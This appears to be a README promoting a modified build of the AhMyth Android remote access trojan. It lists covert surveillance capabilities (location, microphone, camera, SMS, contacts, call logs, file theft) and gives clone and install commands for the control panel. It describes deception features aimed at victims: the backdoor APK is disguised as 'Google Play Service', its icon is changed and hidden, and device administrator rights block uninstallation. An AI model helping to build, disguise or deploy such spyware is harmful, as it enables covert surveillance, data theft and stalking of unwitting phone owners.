AhMyth is an popular open source android rat. But the official AhMyth contains many bugs. For an example, you can't fetch victim's files from the remote server using official AhMyth. So that we have modified the rat and remove all bugs and also added some extra features.
- Server side : desktop application based on electron framework (control panel)
- Client side : android application (backdoor)
- GPS Logging
- Microphone Recording
- View Contacts
- SMS Logs
- Send SMS
- Call Logs
- File Explorer & Downloader
- Built In APK Builder
- Camera Access
- Fetch files bug fixes
- Device administrator permission added that normal users can not uninstall the payload
- Fetching victim's location bug fixes
- The name of the apk file has been changed to Google Play Service so that the victim does not understand that it is a payload.
- Also has been changed the apk icon.
- Android 10 and 11 supported
- App icon will hide if the victim's phone's android version is below android 10. (That's why device admin permission added to prevent uninstallation)
- Now penetration tester can manually hide and unhide app icon (If victim's android version is below Android 10 then the hide/unhide button will show)
- To unhide app icon, dial *55555# and apk icon will be unhidden.
- Due to the background limitation of Android 10 and 11, the started service has been removed and the foreground service has been added. So you should turn off the application notification from the setting.
- Open JDK 8 (to generate apk backdoor)
- Electron (to start the app)
- Open JDK 8
- Node.js (Node.js Package Manager)
- Electron-packer (to build binaries for (OSX,WINDOWS,LINUX))
git clone https://github.com/HiddenPirates/AhMyth-Modified-Version.gitcd AhMyth-Modified-Version/AhMyth-Servernpm install electron-builder --save-devnpm start
- Download binary for windows x64 from here.
- Open JDK 8 (to generate apk backdoor)